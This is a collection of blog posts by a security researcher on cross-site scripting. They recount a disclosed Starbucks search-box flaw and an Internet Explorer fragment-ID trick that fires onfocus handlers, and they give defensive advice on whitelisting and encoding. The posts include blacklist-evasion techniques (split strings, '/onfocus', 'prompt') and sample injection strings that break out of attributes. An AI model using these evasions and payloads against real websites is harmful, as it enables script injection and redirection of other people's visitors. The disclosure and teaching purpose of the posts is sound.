
Easier by far, to use a whitelist – only these few characters are safe,and ALL the rest get encoded.

You might have an incomplete whitelist, but that’s easily fixed later, and at its worst is no more than a slight inefficiency. If you have an incomplete blacklist, you have a security vulnerability.

Back to the story

OK, so having determined that I can’t use the script tag, maybe I can add an event handler to the tag I’m in the middle of displaying, whether it’s a link or an input. Perhaps I can get that event handler to work.

Ever faithful is the “onmouseover” event handler. So I try that.

You don’t need to see the “oops” page again. But I did.

The weirdest thing, though, is that the “onmooseover” event worked just fine.

Except I didn’t have a moose handy to demonstrate it executing.

5-mooseover

So, that means that they had a blacklist of events, and onmouseover was on the list, but onmooseover wasn’t.

Similarly, “onfocus” triggered the “oops” page, but “onficus” didn’t. Again, sadly I didn’t have a ficus with me.

You’re just inventing event names.

Sure, but then so is the community of browser manufacturers. There’s a range of  “ontouch” events that weren’t on the blacklist, but are supported by a browser or two – and then you have to wonder if Google, maker of the Chrome browser and the Glass voice-controlled eyewear, might not introduce an event or two for eyeball tracking. Maybe a Kinect-powered browser will introduce “onwaveat”. Again, the blacklist isn’t future-proof. If someone invents a new event, you have to hope you find out about it before the attackers try to use it.

Again, back to the story…

Then I tried adding characters to the beginning of the event name. Curious – that works.

6-query

And, yes, the source view showed me the event was being injected. Of course, the browser wasn’t executing it, because of course, “?onmouseover” can’t be executed. The HTML spec just doesn’t allow for it.

Eventually, I made my way through the ASCII table to the forward-slash character.

7-slash

Magic!

Yes, that’s it, that executes. There’s the prompt.

Weirdly, if I used “alert” instead of “prompt”, I get the “oops” page. Clearly, “alert” is on the blacklist, “prompt” is not.

I still want to make this a ‘hotter’ report before I send it off to Starbucks, though.

How “hotter”?

Well, it’d be nice if it didn’t require the user to find and wave their mouse over the page element that you’ve found the flaw in.

Fortunately, I’d also recently found a behaviour in Internet Explorer that allows a URL to set focus to an element on the page by its ID or name. And there’s an “onfocus” event I can trigger with “/onfocus”.

8-focused

So, there we are – automated execution of my chosen code.

Anything else to make it more sexy?

Sure – how about something an attacker might try – a redirect to a site of their choosing. [But since I’m not an attacker, we’ll do it to somewhere acceptable]

I tried to inject “onfocus=’document.location=”//google.com”’” – but apparently, “document” and “location” are also on the banned list.

“ownerDocu”, “ment”, “loca” and “tion” aren’t on the blacklist, so I can do “this[“ownerDocu”+”ment”][“loca”+”tion”]=” …

Very quickly, this URL took the visitor away from the Starbucks search page and on to the Google page.

Now it’s ready to report.

Hard part over, right?

Well, no, not really. This took me a couple of months to get reported. I tried “security@starbucks.com”, which is the default address for reporting security issues.

An auto-reply comes my way, informing me this is for Starbucks staff to report [physical] security issues.

I try the webmaster@ address, and that gets me nowhere.

The “Contact Us” link takes me to a customer service representative, and an entertaining exchange that results in them telling me that they’ve passed my email around everyone who’s interested, and the general consensus is that I should go ahead and publish my findings.

So you publish, right?

No, I’m not interested in self-publicising at the cost of someone else’s security. I do this so that things get more secure, not less.

So, I reach out to anyone I know who works for Starbucks, or has ever worked for Starbucks, and finally get to someone in the Information Security team.

This is where things get far easier – and where Starbucks does the right things.

The Information Security team works with me, politely, quickly, calmly, and addresses the problem quickly and completely. The blacklist is still there, and still takes you to the “oops” page – but it’s no longer the only protection in place.

My “onmooseover” and “onficus” events no longer work, because the correct characters are quoted and encoded.

The world is made safer and more secure, and a half a year later, I post this article, so that others can learn from this experience, too.

By withholding publishing until well after the site is fixed, I ensure that I’m not making enemies of people who might be in a position to help me later. By fixing the site quickly and quietly, Starbucks ensure that they protect their customers. And I, after all, am a customer.

The Starbucks Information Security team have also promised that there is now a route from security@ to their inbox, as well as better training for the customer service team to redirect security reports their way, rather than insisting on publishing. I think they were horrified that anyone suggested that. I know I was.

And did I ever tell you about the time I got onto Google’s hall of fame?

Playing with security blogs

I’ve found a new weekend hobby – it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.

I open my favourite search engine (I’m partial to Bing, partly because I get points, but mostly because I’ve met the guys who built it), search for “security blog”, and then pick one at random.

Once I’m at the security blog site – often one I’ve never heard of, despite it being high up in the search results – I find the search box and throw a simple reflected XSS attack at it.

If that doesn’t work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.

[Note: I use reflected XSS, because I know I can only hurt myself. I don’t play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and I’m being paid.]

Finally, I try to find who I should contact about the exploitability of the site.

It’s interesting just how many of these sites are exploitable – some of them falling to the simplest of XSS attacks – and even more interesting to see how many sites don’t have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).

So, what do you find?

I clearly wouldn’t dream of disclosing any of the vulnerabilities I’ve found until well after they’re fixed. Of course, after they’re fixed, I’m happy to see a mention that I’ve helped move the world forward a notch on some security scale. [Not sure why I’m not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.

From clicking the link to exploit is either under ten minutes or not at all – and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.

Try using a WAF – NOT!

You can try using a WAF to solve your XSS problem, but then you’ve got two problems – a vulnerable web site, and that you have to manage your WAF settings. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it really doesn’t ever fix the problem.

Don’t echo my search query

If you can, don’t echo back to me what I sent you, because that’s how these attacks usually start. Don’t even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.

Remove my strange characters

Unless you’re running a source code site, you probably don’t need me to search for angle brackets, or a number of other characters. So take them out of my search – or plain reject my search if I include them in my search.

Encode everything

OK, so you don’t have to encode the basics – what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.

Which encoding?

Yeah, that’s always the hard part. Encode it using the right encoding. That’s the short version. The long version is that you figure out what’s going to decode it, and make sure you encode for every layer that will decode. If you’re putting my text into a web page as a part of the page’s content, HTML encode it. If it’s in an attribute string, quote the characters using HTML attribute encoding – and make sure you quote the entire attribute value! If it’s an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.

[Then, of course, check that your encoding hasn’t killed the basic function of the search box!]

Respond to security reports

You should definitely respond to security reports – I understand that not everyone can have a 24/7 response team watching their blog (I certainly don’t) – you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they don’t get a response much sooner, and see that as cause to publish their findings.

Me, I send a message first to ask if I’ve found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.

Be like Billy – Mind your XSS Manners!

I’ve said before that I wish programmers would respond to reports of XSS as if I’d told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.

Using URL anchors to enliven XSS exploits

I hope this is original, I certainly couldn’t find anything in a quick bit of research on “Internet Explorer”, “anchor” / “fragment id” and “onfocus” or “focus”. [Click here for the TLDR version.]

Those of you who know me, or have been reading this blog for a while know that I have something of a soft spot for the XSS exploits (See here, here, here and here – oh, and here). One of the reasons I like them is that I can test sites without causing any actual damage to them – a reflected XSS that I launch on myself only really affects me. [Stored XSS, now that’s a different matter] And yet, the issues that XSS brings up are significant and severe.

A quick reminder

XSS issues are significant and severe because:

  • An attacker with a successful XSS is rewriting your web site on its way to the user
  • XSS attacks can be used to deliver the latest Java / ActiveX / Flash / Acrobat exploits
  • Stored XSS can affect all of your customers, and can turn your web server into a worm to infect all of your users all of the time
  • A reflected XSS can be used to redirect your users to a competitor’s or attacker’s web site
  • A reflected or stored XSS attack can be used to void any CSRF protection you have in place
  • XSS vulnerability is usually a sign that you haven’t done the “fit and finish” checks in your security reviews
  • XSS vulnerability is an embarrassing rookie mistake, made often by seasoned developers

Make it “SEXY”

So, I enjoy reporting XSS issues to web sites and seeing how they fix them.

It’s been said I can’t pass a Search box on a web site without pasting in some kind of script and seeing whether I can exploit it.

So, the other day I decided for fun to go and search for “security blog” and pick some entries at random. The first result that came up – blog.schneier.com – seemed unlikely to yield any fruit, because, well, Bruce Schneier. I tried it anyway, and the search box goes to an external search engine, which looked pretty solid. No luck there.

A couple of others – and I shan’t say how far down the list, for obvious reasons – turned up trumps. Moderately simple injections into attributes in HTML tags on the search results page.

One only allowed me to inject script into an existing “onfocus” event handler, and the other one allowed me to create the usual array of “onmouseover”, “onclick”, “onerror”, etc handlers – and yes, “onfocus” as well.

I reported them to the right addresses, and got the same reply back each time – this is a “low severity” issue, because the user has to take some action, like wiggling the mouse over the box, clicking in it, etc.

Could I raise the severity, they asked, by making it something that required no user interaction at all, save for loading the link?

Could I make the attack more “sexy”?

Try something stupid

Whenever I’m faced with an intellectual challenge like that, I find that often a good approach is to simply try something stupid. Something so stupid that it can’t possibly work, but in failing it will at least give me insight into what might work.

I want to set the user’s focus to a field, so I want to do something a bit like “go to the field”. And the closest automatic thing that there is to “going to a field” in a URL is the anchor portion, or “fragment id” of the URL.

Anchor? What’s that in a URL?

You’ll have seen them, even if you haven’t really remarked on them very much. A URL consists of a number of parts:

protocol://address:port/path1//path2?query#anchor

The anchor is often called the “hash”, because it comes after the “hash” or “sharp” or “pound” (if you’re not British) character. [The query often consists of sets of paired keys and values, like “key1=value1&key2=value2”, etc]

The purpose of an anchor is to scroll the window to bring a specific portion to the top. So, you can give someone a link not just to a particular page, but to a portion of that page. It’s a really great idea. Usually an anchor in the URL takes you to a named anchor tag in the page – something that reads “<a name=foobar></a>” will, for instance, be scrolled to the top whenever you visit it with a URL that ends with “#foobar”.

[The W3C documentation only states that the anchor or fragment ID is used to “visit” the named tag. The word “visit” is never actually defined. Common behaviour is to load the page if it’s not already loaded, and to scroll the page to bring the visited element to the top.]

This anchor identifier in the URL is also known as a “fragment identifier”, because technically the anchor is the entire URL. Not what people make as common usage, though.

XSS fans like myself are already friendly with the anchor identifier, because it has the remarkable property of never being sent to the server by the browser! This means that if your attack depends on something in the anchor identifier, you don’t stand much chance of being detected by the server administrators.

Sneaky.

The stupid thing

So, the stupid thing that I thought about is “does this work for any name? and is it the same as focus?”

Sure enough, in the W3C documentation for HTML, here it is:

Destination anchors in HTML documents may be specified either by the A element (naming it with the name attribute), or by any other element (naming with the id attribute).

[From http://www.w3.org/TR/html4/struct/links.html#h-12.1]

So, that means any tag with an “id” attribute can be scrolled into view. This effectively applies to any element with a “name” attribute too, because:

This attribute [name] names the current anchor so that it may be the destination of another link. The value of this attribute must be a unique anchor name. The scope of this name is the current document. Note that this attribute shares the same name space as the id attribute. [my emphasis]

[From http://www.w3.org/TR/html4/struct/links.html#adef-name-A]

This is encouraging, because all those text boxes already have to have ids or names to work.

So, we can bring a text box to the top of the browser window by specifying its id or name attribute as a fragment.

That’s the first stupid thing checked off and working.

Bringing it into focus

But moving a named item to the top of the screen isn’t the same as selecting it, clicking on it, or otherwise giving it focus.

Or is it?

Testing in Firefox, Chrome and Safari suggested not.

Testing in Internet Explorer, on the other hand, demonstrated that even for as old a version as IE8, all the way through IE9 and IE10, caused focus behaviour – including any “onfocus” handler – to trigger.

The TLDR version:

Internet Explorer has a behaviour different from other browsers which makes it easier to exploit a certain category of XSS vulnerabilities in web sites.

If you are attacking users of a vulnerable site that allows an attacker to inject code into an “onfocus” handler (new or existing), you can force visitors to trigger that “onfocus” event, simply by adding the id or name of the vulnerable HTML tag to the end of the URL as a fragment ID.

You can try it if you like – using the URL http://www.microsoft.com/en-us/default.aspx#ctl00_ctl16_ctl00_ctl00_q

OK, so you clicked it and it didn’t drop down the menu that normally comes when you click in the search field on Microsoft’s front page. That’s because the onfocus handler wasn’t loaded when the browser set the focus. Try reloading it.

You can obviously build any number of test pages to look at this behaviour:

<form>

<input type="text" name="exploit" id="exploitid" onfocus="alert(1)" />

</form>

Loading that with a link to formpage.html#exploit or formpage.html#exploitid will pop up an ‘alert’ dialog box.

So, that’s a security flaw in IE, right?

No, I don’t think it is – I don’t know that it’s necessarily even a flaw.

The documentation I linked to above only talks about the destination anchor being used to “visit” a resource. It doesn’t even say that the named anchor should be brought into view in any way. [Experiment: what happens if the ID in the fragment identifier is a “type=hidden” input field?]

It doesn’t say you should set focus; it also doesn’t say you should not set focus. Setting focus may be simply the most convenient way that Internet Explorer has to bring the named element into view.

And the fact that it makes XSS exploits a little easier doesn’t make it a security flaw either – the site you’re visiting STILL has to have an XSS flaw on it somewhere.

Is it right to publish this?

Finally, the moral question has to be asked and answered.

I start by noting that if I can discover this, it’s likely a few dozen other people have discovered it too – and so far, they’re keeping it to themselves. That seems like the less-right behaviour – because now those people are going to be using this on sites unaware of it. Even if the XSS injection is detected by the web site through looking in their logs, those same logs will tell them that the injection requires a user action – setting focus to a field – and that there’s nothing causing that to happen, so it’s a relatively minor issue.

Except it’s not as minor as that, because the portion of the URL that they CAN’T see is going to trigger the event handler that just got injected.

So I think the benefit far outweighs the risk – now defenders can know that an onfocus handler will be triggered by a fragment ID in a URL, and that the fragment ID will not appear in their log files, because it’s not sent to the server.

I’ve already contacted Microsoft’s Security team and had the response that they don’t think it’s a security problem. They’ve said they’ll put me in touch with the Internet Explorer team for their comments – and while I haven’t heard anything yet, I’ll update this blog when / if they do.

In general, I believe that the right thing to do with security issues is to engage in coordinated disclosure, because the developer or vendor is generally best suited to addressing specific flaws. In this case, the flaw is general, in that it’s every site that is already vulnerable to XSS or HTML injection that allows the creation or modification of an “onfocus” event handler. So I can’t coordinate.

The best I can do is communicate, and this is the best I know how.

On new exploit techniques

Last year’s discussion on “Scriptless XSS” made me realise that there are two kinds of presentation about new exploits – those that talk about a new way to trigger the exploit, and those that talk about a new way to take advantage of the exploit.

Since I didn’t actually see the “Scriptless XSS” presentation at Blue Hat (not having been invited, I think it would be bad manners to just turn up), I won’t address it directly, and it’s entirely possible that much of what I say is actually irrelevant to that particular paper. I’m really being dreadfully naughty here and setting up a strawman to knock down. In the tech industry, this practice is often referred to as “journalism”.

So where’s my distinction?

Let’s say you’re new to XSS. It’s possible many of you actually are new to XSS, and if you are, please read my previous articles about how it’s just another name for allowing an attacker to inject content (usually HTML) into a web page.

Your first XSS exploit example may be that you can put “<script>alert(1)</script>” into a search field, and it gets included without encoding into the body of the results page. This is quite frankly so easy I’ve taught my son to do it, and we’ve had fun finding sites that are vulnerable to this. Of course, we then inform them of the flaw, so that they get it fixed. XSS isn’t perhaps the most damaging of exploits – unlike SQL injection, you’re unlikely to use it to steal a company’s entire customer database – but it is an embarrassing indication that the basics of security hygiene are not being properly followed by at least some of your development team.

The trigger of the exploit here is the “<>” portion (not including the part replaced by ellipsis), and the exploit itself is the injection of script containing an alert(1) command.

Let’s say now that the first thing a programmer tries to protect his page is to replace the direct embedding of text with an <input> tag, whose value is set to the user-supplied text, in quotes.

Your original exploit is foiled, because it comes out as:

<input readonly=1 value="<script>alert(1)</script>">

That’s OK, though, because the attacker will see that, and note that all he has to do is provide the terminating quote and angle bracket at the start of his input, to produce instead:

<input readonly=1 value=""><script>alert(1)</script>">

This is a newer method of exploiting XSS-vulnerable code. Although a simple example, this is the sort of thing it’s worth getting excited about.

Why is that exciting?

It’s exciting because it causes a change in how you planned to fix the exploit. You had a fix that prevented the exploit from happening, and now it fails, so you have to rethink this. Any time you are forced to rethink your assumptions because of new external data, why, that’s SCIENCE!

And the other thing is…?

Well, the other thing is noting that if the developer did the stupid thing, and blocked the word “alert”, the attacker can get around that defence by using the “prompt” keyword instead, or by redirecting the web page to somewhere the attacker controls. This may be a new result, but it’s not a new trigger, it’s not a new cause.

When defending your code against attack, always ask yourself which is the trigger of an attack, rather than the body of the attack itself. Your task is to prevent the trigger, at which point the body becomes irrelevant.

Time to defend myself.

I’m sure that someone will comment on this article and say that I’m misrepresenting the field of attack blocking – after all, the XSS filters built into major browsers surely fall into the category of blocking the body, rather than the trigger, of an attack, right?

Sure, and that’s one reason why they’re not 100% effective. They’re a stopgap measure – a valuable stopgap measure, don’t get me wrong, but they are more in the sense of trying to recognise bad guys by the clothing they choose to wear, rather than recognising bad guys by the weapons they carry, or their actions in breaking locks and planting explosives. Anyone who’s found themselves, as I have, in the line of people “randomly selected for searching” at the airport, and looked around and noted certain physical similarities between everyone in the line, will be familiar with the idea that this is more an exercise in increasing irritation than in applying strong security.

It’s also informative to see methods by which attacks are carried out – as they grow in sophistication from fetching immediate cookie data to infecting browser sessions and page load semantics, it becomes easier and easier to tell developers “look at all these ways you will be exploited, and you will begin to see that we can’t depend on blocking the attack unless we understand and block the triggers”.

Keep doing what you’re doing

I’m not really looking to change any behaviours, nor am I foolish enough to think that people will start researching different things as a result of my ranting here.

But, just as I’ve chosen to pay attention to conferences and presentations that tell me how to avoid, prevent and fix, over those that only tell me how to break, I’ll also choose to pay attention to papers that show me an expansion of the science of attacks, their detection and prevention, over those that engage in a more operational view of “so you have an inlet, what do you do with it?”

XSS Hipster loved Scriptless XSS before it was cool

I was surprised last night and throughout today, to see that a topic of major excitement at the Microsoft BlueHat Security Conference was that of “Scriptless XSS”.

The paper presented on the topic certainly repeats the word “novel” a few times, but I will note that if you do a Google or Bing search for “Scriptless XSS”, the first result in each case is, of course, a simple blog post from yours truly, a little over two years ago, in July 2010.

As the article notes, this isn’t even the first time I’d used the idea that XSS (Cross Site Scripting) is a complete misnomer, and that “HTML injection” is a more appropriate description. JavaScript – the “Scripting” in most people’s explanations of Cross Site Scripting – is definitely not required, and is only used because it is an alarmingly clear demonstration that something inappropriate is happening.

Every interview in the security field – every one!

Every time I have had an interview in the security field – that’s since 2006 – I’ve been asked “Explain what Cross Site Scripting is”, and rather hesitantly at first, but with growing surety, I have answered that it is simply “HTML injection”, and the conversation goes wonderfully from there.

Why did I come up with this idea?

Fairly simply, I’ve found that if you throw standard XSS exploits at developers and tell them to fix the flaw, they do silly things like blocking the word “script”. As I’ve pointed out before, Cross Site Scripting (as with all injection attacks) requires an Injection (how the attacker provides their data), an Escape (how the attacker’s data moves from data into code), an Attack or Execution (the payload), and optionally a Cleanup (returning the user’s browser state to normal so they don’t notice the attack happening).

It’s not the script, stupid, it’s the escape.

Attacks are wide and varied – the paper on Scriptless Attacks makes that clear, by presenting a number of novel (to me, at least) attacks using CSS (Cascading Style Sheet) syntax to exfiltrate data by measuring scrollbars. My example attack used nothing so outlandish – just the closure of one form, and the opening of another, with enough CSS attribute monkeying to make it look like the same form. The exfiltration of data in this case is by means of the rather pedestrian method of having the user type their password into a form field and submit it to a malicious site. No messing around with CSS to measure scrollbars and determine the size of fonts.

Hats off to these guys, though.

I will say this – the attacks they present are an interesting and entertaining demonstration that if you’re trying to block the Attack or Cleanup phases of an Injection Attack, you have already failed, you just don’t know it yet. Clearly a lot of work and new study went into these attacks, but it’s rather odd that their demonstrations are about the more complicated end of Scriptless XSS, rather than about the idea that defenders still aren’t aware of how best to defend.

Also, no doubt, they had the sense to submit a paper on this – all I did was blog about it, and provide a pedestrian example with no flashiness to it at all.

Hipster gets no respect.

So, yeah, I was talking about XSS without the S, long before it was cool to do so. As my son informs me, that makes me the XSS Hipster. It’d be gratifying to my ego to get a little nod for that (heck, I don’t even get an invite to BlueHat), but quite frankly rather than feeling all pissed off about that, I’m actually rather pleased that people are working to get the message out that JavaScript isn’t the problem, at least when it comes to XSS.

The problem is the Injection and the Escape – you can block the Injection by either not accepting data, or by having a tight whitelist of good values; and you can block the Escape by appropriately encoding all characters not definitively known to be safe.